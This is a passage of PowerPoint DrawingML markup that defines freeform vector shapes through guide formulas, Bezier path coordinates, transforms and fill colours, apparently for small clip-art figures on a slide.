                    <a:gd name="T14" fmla="*/ 36 w 199"/>
                    <a:gd name="T15" fmla="*/ 168 h 232"/>
                    <a:gd name="T16" fmla="*/ 54 w 199"/>
                    <a:gd name="T17" fmla="*/ 47 h 232"/>
                    <a:gd name="T18" fmla="*/ 53 w 199"/>
                    <a:gd name="T19" fmla="*/ 164 h 232"/>
                    <a:gd name="T20" fmla="*/ 62 w 199"/>
                    <a:gd name="T21" fmla="*/ 175 h 232"/>
                    <a:gd name="T22" fmla="*/ 113 w 199"/>
                    <a:gd name="T23" fmla="*/ 189 h 232"/>
                    <a:gd name="T24" fmla="*/ 140 w 199"/>
                    <a:gd name="T25" fmla="*/ 169 h 232"/>
                    <a:gd name="T26" fmla="*/ 140 w 199"/>
                    <a:gd name="T27" fmla="*/ 169 h 232"/>
                    <a:gd name="T28" fmla="*/ 138 w 199"/>
                    <a:gd name="T29" fmla="*/ 88 h 232"/>
                    <a:gd name="T30" fmla="*/ 136 w 199"/>
                    <a:gd name="T31" fmla="*/ 71 h 232"/>
                    <a:gd name="T32" fmla="*/ 136 w 199"/>
                    <a:gd name="T33" fmla="*/ 70 h 232"/>
                    <a:gd name="T34" fmla="*/ 136 w 199"/>
                    <a:gd name="T35" fmla="*/ 71 h 232"/>
                    <a:gd name="T36" fmla="*/ 138 w 199"/>
                    <a:gd name="T37" fmla="*/ 88 h 232"/>
                    <a:gd name="T38" fmla="*/ 160 w 199"/>
                    <a:gd name="T39" fmla="*/ 204 h 232"/>
                    <a:gd name="T40" fmla="*/ 192 w 199"/>
                    <a:gd name="T41" fmla="*/ 194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9" h="232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7"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="10"/>
                        <a:pt x="69" y="4"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="4"/>
                        <a:pt x="30" y="12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1"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="158"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="122"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="174"/>
                        <a:pt x="62" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="189"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="181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1"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="79"/>
                        <a:pt x="137" y="74"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="76"/>
                        <a:pt x="138" y="82"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="110"/>
                        <a:pt x="148" y="150"/>
                        <a:pt x="160" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="232"/>
                        <a:pt x="199" y="218"/>
                        <a:pt x="192" y="194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06" name="Freeform 531">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09B197BA-7835-451C-9CF3-5DB0274103D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 flipH="1">
                  <a:off x="3976" y="2252"/>
                  <a:ext cx="132" cy="154"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 199"/>
                    <a:gd name="T1" fmla="*/ 194 h 232"/>
                    <a:gd name="T2" fmla="*/ 169 w 199"/>
                    <a:gd name="T3" fmla="*/ 49 h 232"/>
                    <a:gd name="T4" fmla="*/ 143 w 199"/>
                    <a:gd name="T5" fmla="*/ 24 h 232"/>
                    <a:gd name="T6" fmla="*/ 100 w 199"/>
                    <a:gd name="T7" fmla="*/ 13 h 232"/>
                    <a:gd name="T8" fmla="*/ 60 w 199"/>
                    <a:gd name="T9" fmla="*/ 2 h 232"/>
                    <a:gd name="T10" fmla="*/ 30 w 199"/>
                    <a:gd name="T11" fmla="*/ 12 h 232"/>
                    <a:gd name="T12" fmla="*/ 4 w 199"/>
                    <a:gd name="T13" fmla="*/ 159 h 232"/>
                    <a:gd name="T14" fmla="*/ 36 w 199"/>
                    <a:gd name="T15" fmla="*/ 168 h 232"/>
                    <a:gd name="T16" fmla="*/ 54 w 199"/>
                    <a:gd name="T17" fmla="*/ 47 h 232"/>
                    <a:gd name="T18" fmla="*/ 53 w 199"/>
                    <a:gd name="T19" fmla="*/ 164 h 232"/>
                    <a:gd name="T20" fmla="*/ 62 w 199"/>
                    <a:gd name="T21" fmla="*/ 175 h 232"/>
                    <a:gd name="T22" fmla="*/ 113 w 199"/>
                    <a:gd name="T23" fmla="*/ 189 h 232"/>
                    <a:gd name="T24" fmla="*/ 140 w 199"/>
                    <a:gd name="T25" fmla="*/ 169 h 232"/>
                    <a:gd name="T26" fmla="*/ 140 w 199"/>
                    <a:gd name="T27" fmla="*/ 169 h 232"/>
                    <a:gd name="T28" fmla="*/ 138 w 199"/>
                    <a:gd name="T29" fmla="*/ 88 h 232"/>
                    <a:gd name="T30" fmla="*/ 136 w 199"/>
                    <a:gd name="T31" fmla="*/ 71 h 232"/>
                    <a:gd name="T32" fmla="*/ 136 w 199"/>
                    <a:gd name="T33" fmla="*/ 70 h 232"/>
                    <a:gd name="T34" fmla="*/ 136 w 199"/>
                    <a:gd name="T35" fmla="*/ 71 h 232"/>
                    <a:gd name="T36" fmla="*/ 138 w 199"/>
                    <a:gd name="T37" fmla="*/ 88 h 232"/>
                    <a:gd name="T38" fmla="*/ 160 w 199"/>
                    <a:gd name="T39" fmla="*/ 204 h 232"/>
                    <a:gd name="T40" fmla="*/ 192 w 199"/>
                    <a:gd name="T41" fmla="*/ 194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9" h="232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7"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="10"/>
                        <a:pt x="69" y="4"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="4"/>
                        <a:pt x="30" y="12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1"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="158"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="122"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="174"/>
                        <a:pt x="62" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="189"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="181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1"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="79"/>
                        <a:pt x="137" y="74"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="76"/>
                        <a:pt x="138" y="82"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="110"/>
                        <a:pt x="148" y="150"/>
                        <a:pt x="160" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="232"/>
                        <a:pt x="199" y="218"/>
                        <a:pt x="192" y="194"/>
                      </a:cubicBezTo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07" name="Freeform 532">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D257F9-C724-497F-A3B5-5551CD38259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 flipH="1">
                  <a:off x="4044" y="2387"/>
                  <a:ext cx="7" cy="110"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 11 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="15"/>
                        <a:pt x="9" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="7"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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08" name="Freeform 533">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD1BD88B-D82A-419F-9FC9-929FF05E37F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 flipH="1">
                  <a:off x="4022" y="2245"/>
                  <a:ext cx="43" cy="27"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 28 w 65"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 65"/>
                    <a:gd name="T3" fmla="*/ 19 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 65"/>
                    <a:gd name="T5" fmla="*/ 12 h 41"/>
                    <a:gd name="T6" fmla="*/ 52 w 65"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 56 w 65"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 28 w 65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5" h="41">
                      <a:moveTo>
                        <a:pt x="28" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="37"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="9" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="16"/>
                        <a:pt x="12" y="15"/>
                        <a:pt x="15" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="10"/>
                        <a:pt x="52" y="0"/>
                        <a:pt x="52" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="21"/>
                        <a:pt x="46" y="25"/>
                        <a:pt x="56" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="33"/>
                        <a:pt x="45" y="41"/>
                        <a:pt x="28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09" name="Freeform 534">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0BA637-7BC5-4B8D-8954-A87A6493AFF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 flipH="1">
                  <a:off x="3990" y="2253"/>
                  <a:ext cx="105" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 150 w 159"/>
                    <a:gd name="T1" fmla="*/ 48 h 189"/>
                    <a:gd name="T2" fmla="*/ 124 w 159"/>
                    <a:gd name="T3" fmla="*/ 23 h 189"/>
                    <a:gd name="T4" fmla="*/ 123 w 159"/>
                    <a:gd name="T5" fmla="*/ 23 h 189"/>
                    <a:gd name="T6" fmla="*/ 123 w 159"/>
                    <a:gd name="T7" fmla="*/ 23 h 189"/>
                    <a:gd name="T8" fmla="*/ 123 w 159"/>
                    <a:gd name="T9" fmla="*/ 23 h 189"/>
                    <a:gd name="T10" fmla="*/ 122 w 159"/>
                    <a:gd name="T11" fmla="*/ 22 h 189"/>
                    <a:gd name="T12" fmla="*/ 122 w 159"/>
                    <a:gd name="T13" fmla="*/ 22 h 189"/>
                    <a:gd name="T14" fmla="*/ 116 w 159"/>
                    <a:gd name="T15" fmla="*/ 21 h 189"/>
                    <a:gd name="T16" fmla="*/ 116 w 159"/>
                    <a:gd name="T17" fmla="*/ 21 h 189"/>
                    <a:gd name="T18" fmla="*/ 113 w 159"/>
                    <a:gd name="T19" fmla="*/ 20 h 189"/>
                    <a:gd name="T20" fmla="*/ 113 w 159"/>
                    <a:gd name="T21" fmla="*/ 20 h 189"/>
                    <a:gd name="T22" fmla="*/ 111 w 159"/>
                    <a:gd name="T23" fmla="*/ 19 h 189"/>
                    <a:gd name="T24" fmla="*/ 109 w 159"/>
                    <a:gd name="T25" fmla="*/ 19 h 189"/>
                    <a:gd name="T26" fmla="*/ 108 w 159"/>
                    <a:gd name="T27" fmla="*/ 19 h 189"/>
                    <a:gd name="T28" fmla="*/ 105 w 159"/>
                    <a:gd name="T29" fmla="*/ 18 h 189"/>
                    <a:gd name="T30" fmla="*/ 52 w 159"/>
                    <a:gd name="T31" fmla="*/ 12 h 189"/>
                    <a:gd name="T32" fmla="*/ 66 w 159"/>
                    <a:gd name="T33" fmla="*/ 7 h 189"/>
                    <a:gd name="T34" fmla="*/ 57 w 159"/>
                    <a:gd name="T35" fmla="*/ 5 h 189"/>
                    <a:gd name="T36" fmla="*/ 60 w 159"/>
                    <a:gd name="T37" fmla="*/ 5 h 189"/>
                    <a:gd name="T38" fmla="*/ 41 w 159"/>
                    <a:gd name="T39" fmla="*/ 1 h 189"/>
                    <a:gd name="T40" fmla="*/ 40 w 159"/>
                    <a:gd name="T41" fmla="*/ 1 h 189"/>
                    <a:gd name="T42" fmla="*/ 11 w 159"/>
                    <a:gd name="T43" fmla="*/ 11 h 189"/>
                    <a:gd name="T44" fmla="*/ 0 w 159"/>
                    <a:gd name="T45" fmla="*/ 73 h 189"/>
                    <a:gd name="T46" fmla="*/ 30 w 159"/>
                    <a:gd name="T47" fmla="*/ 83 h 189"/>
                    <a:gd name="T48" fmla="*/ 34 w 159"/>
                    <a:gd name="T49" fmla="*/ 50 h 189"/>
                    <a:gd name="T50" fmla="*/ 34 w 159"/>
                    <a:gd name="T51" fmla="*/ 163 h 189"/>
                    <a:gd name="T52" fmla="*/ 43 w 159"/>
                    <a:gd name="T53" fmla="*/ 174 h 189"/>
                    <a:gd name="T54" fmla="*/ 94 w 159"/>
                    <a:gd name="T55" fmla="*/ 188 h 189"/>
                    <a:gd name="T56" fmla="*/ 121 w 159"/>
                    <a:gd name="T57" fmla="*/ 168 h 189"/>
                    <a:gd name="T58" fmla="*/ 121 w 159"/>
                    <a:gd name="T59" fmla="*/ 111 h 189"/>
                    <a:gd name="T60" fmla="*/ 119 w 159"/>
                    <a:gd name="T61" fmla="*/ 87 h 189"/>
                    <a:gd name="T62" fmla="*/ 119 w 159"/>
                    <a:gd name="T63" fmla="*/ 82 h 189"/>
                    <a:gd name="T64" fmla="*/ 118 w 159"/>
                    <a:gd name="T65" fmla="*/ 80 h 189"/>
                    <a:gd name="T66" fmla="*/ 118 w 159"/>
                    <a:gd name="T67" fmla="*/ 77 h 189"/>
                    <a:gd name="T68" fmla="*/ 119 w 159"/>
                    <a:gd name="T69" fmla="*/ 87 h 189"/>
                    <a:gd name="T70" fmla="*/ 123 w 159"/>
                    <a:gd name="T71" fmla="*/ 112 h 189"/>
                    <a:gd name="T72" fmla="*/ 159 w 159"/>
                    <a:gd name="T73" fmla="*/ 105 h 189"/>
                    <a:gd name="T74" fmla="*/ 150 w 159"/>
                    <a:gd name="T75" fmla="*/ 48 h 1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59" h="189">
                      <a:moveTo>
                        <a:pt x="150" y="48"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="147" y="31"/>
                        <a:pt x="132" y="26"/>
                        <a:pt x="124" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="23"/>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="23"/>
                        <a:pt x="122" y="23"/>
                        <a:pt x="122" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="22"/>
                        <a:pt x="122" y="22"/>
                        <a:pt x="122" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="22"/>
                        <a:pt x="118" y="21"/>
                        <a:pt x="116" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="116" y="21"/>
                        <a:pt x="116" y="21"/>
                        <a:pt x="116" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="115" y="20"/>
                        <a:pt x="114" y="20"/>
                        <a:pt x="113" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="20"/>
                        <a:pt x="113" y="20"/>
                        <a:pt x="113" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="112" y="20"/>
                        <a:pt x="112" y="19"/>
                        <a:pt x="111" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="19"/>
                        <a:pt x="110" y="19"/>
                        <a:pt x="109" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="19"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="18"/>
                        <a:pt x="106" y="18"/>
                        <a:pt x="105" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="36"/>
                        <a:pt x="54" y="21"/>
                        <a:pt x="52" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="7"/>
                        <a:pt x="66" y="7"/>
                        <a:pt x="66" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="7"/>
                        <a:pt x="60" y="6"/>
                        <a:pt x="57" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59" y="5"/>
                        <a:pt x="60" y="5"/>
                        <a:pt x="60" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="2"/>
                        <a:pt x="47" y="2"/>
                        <a:pt x="41" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="1"/>
                        <a:pt x="40" y="1"/>
                        <a:pt x="40" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="0"/>
                        <a:pt x="14" y="3"/>
                        <a:pt x="11" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="13"/>
                        <a:pt x="5" y="41"/>
                        <a:pt x="0" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="80"/>
                        <a:pt x="25" y="82"/>
                        <a:pt x="30" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="68"/>
                        <a:pt x="34" y="56"/>
                        <a:pt x="34" y="50"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34" y="88"/>
                        <a:pt x="34" y="136"/>
                        <a:pt x="34" y="163"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="168"/>
                        <a:pt x="37" y="173"/>
                        <a:pt x="43" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="176"/>
                        <a:pt x="87" y="186"/>
                        <a:pt x="94" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="189"/>
                        <a:pt x="118" y="180"/>
                        <a:pt x="121" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="149"/>
                        <a:pt x="121" y="129"/>
                        <a:pt x="121" y="111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="103"/>
                        <a:pt x="120" y="94"/>
                        <a:pt x="119" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="85"/>
                        <a:pt x="119" y="84"/>
                        <a:pt x="119" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="81"/>
                        <a:pt x="118" y="81"/>
                        <a:pt x="118" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="118" y="79"/>
                        <a:pt x="118" y="78"/>
                        <a:pt x="118" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="80"/>
                        <a:pt x="119" y="83"/>
                        <a:pt x="119" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="93"/>
                        <a:pt x="122" y="102"/>
                        <a:pt x="123" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="112"/>
                        <a:pt x="145" y="111"/>
                        <a:pt x="159" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="79"/>
                        <a:pt x="151" y="55"/>
                        <a:pt x="150" y="48"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="39A962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10" name="Freeform 535">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB26F87C-A73C-46DE-BFD8-FDCCA5F2033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 flipH="1">
                  <a:off x="4018" y="2209"/>
                  <a:ext cx="53" cy="53"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 42 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1"/>
                      </a:cubicBezTo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11" name="Freeform 538">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF52F0F7-648E-4CA1-8392-5830EBD780B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 flipH="1">
                  <a:off x="4019" y="2243"/>
                  <a:ext cx="5" cy="1"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 8"/>
                    <a:gd name="T1" fmla="*/ 0 h 1"/>
                    <a:gd name="T2" fmla="*/ 8 w 8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8" h="1">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="8" y="0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12" name="Freeform 539">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D46193F8-306A-4832-B363-ADE1FCA1F6A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 flipH="1">
                  <a:off x="4019" y="2243"/>
                  <a:ext cx="5" cy="1"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 8"/>
                    <a:gd name="T1" fmla="*/ 0 h 1"/>
                    <a:gd name="T2" fmla="*/ 8 w 8"/>
                    <a:gd name="T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8" h="1">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="8" y="0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27" name="Group 913">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8B59AC1-AC40-424D-9AAF-2F06E0C25F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25058" y="2455068"/>
              <a:ext cx="254093" cy="419921"/>
              <a:chOff x="4140" y="1950"/>
              <a:chExt cx="190" cy="314"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1797" name="Freeform 911">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB5C8337-BF88-4312-B718-9E5D021536FC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4235" y="1976"/>
                <a:ext cx="95" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 600"/>
                  <a:gd name="T1" fmla="*/ 161 h 1817"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1817"/>
                  <a:gd name="T4" fmla="*/ 600 w 600"/>
                  <a:gd name="T5" fmla="*/ 1656 h 1817"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 0 h 1817"/>
                  <a:gd name="T8" fmla="*/ 0 w 600"/>
                  <a:gd name="T9" fmla="*/ 161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0" h="1817">
                    <a:moveTo>
                      <a:pt x="0" y="161"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="161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98" name="Freeform 912">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D23EE04E-5EC4-478D-A809-23A227E6560E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4140" y="1950"/>
                <a:ext cx="95" cy="289"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 600 w 600"/>
                  <a:gd name="T1" fmla="*/ 0 h 1819"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 163 h 1819"/>
                  <a:gd name="T4" fmla="*/ 0 w 600"/>
                  <a:gd name="T5" fmla="*/ 1819 h 1819"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
